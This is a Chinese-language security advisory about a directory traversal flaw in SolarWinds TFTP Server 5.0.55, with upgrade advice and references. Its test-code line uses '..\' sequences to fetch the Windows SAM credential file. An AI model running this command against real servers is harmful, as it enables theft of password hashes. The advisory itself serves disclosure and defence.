SolarWinds TFTP服务程序存在目录遍历漏洞发布时间:2002-10-29 更新时间:2002-10-29 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:6045 受影响系统 SolarWinds TFTP Server Standard Edition 5.0.55详细描述 SolarWinds TFTP服务程序是简单文件传输协议实现。 SolarWinds TFTP服务程序没有正确处理用户输入,可导致提交包含多个'../'字符的文件请求,而获得系统中任意文件。 测试代码 tftp example.com GET a\..\..\winnt\repair\sam 解决方案 升级程序: SolarWinds TFTP Server Standard Edition 5.0.55: SolarWinds Upgrade SolarWinds TFTP Server 5.0.60 ftp://ftp.solarwinds.net/pub/SolarWinds-TFTP-Server.exe 相关信息 Matthew Murphy <mattmurphy@kc.rr.com>. 参考:http://online.securityfocus.com/archive/1/297092 相关主页:http://solarwinds.net/Tools/Free_tools/TFTP_Server/index.htm |
